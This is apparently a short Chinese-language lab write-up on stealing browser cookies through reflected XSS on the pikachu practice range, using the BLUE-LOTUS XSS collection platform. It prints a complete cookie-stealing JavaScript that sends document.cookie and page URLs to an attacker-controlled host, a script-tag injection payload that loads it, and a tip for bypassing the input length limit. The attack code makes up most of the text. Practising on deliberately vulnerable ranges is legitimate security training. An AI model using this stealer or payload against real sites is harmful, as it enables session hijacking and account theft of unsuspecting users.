XSS平台获取cookie
1.环境介绍
- 靶场:pikachu
- XSS平台:BLUE-LOTUS
- 浏览器:谷歌浏览器
2.流程介绍
登录XSS平台,创建获取cookie的脚本
var website = "http://网站地址";
(function() {
(new Image()).src = website + '/?keepsession=1&location=' + escape((function() {
try {
return document.location.href
} catch (e) {
return ''
}
})()) + '&toplocation=' + escape((function() {
try {
return top.location.href
} catch (e) {
return ''
}
})()) + '&cookie=' + escape((function() {
try {
return document.cookie
} catch (e) {
return ''
}
})()) + '&opener=' + escape((function() {
try {
return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
} catch (e) {
return ''
}
})());
})();
登录pikachu,选择Cross-Site-Scripting下的反射型XSS(get)
由于输入框在前端进行了长度限制,可以选择检查进行修改
然后再输入框内输入payload
<script src="https:///网站地址/myjs/cookie.js"></script>
执行后就可以在XSS接收面板获取到用户的cookie信息了
3.遇到的问题
由于我自己搭建的平台使用的是https协议,而模板自动生成的是http所以导致不能接收到cookie信息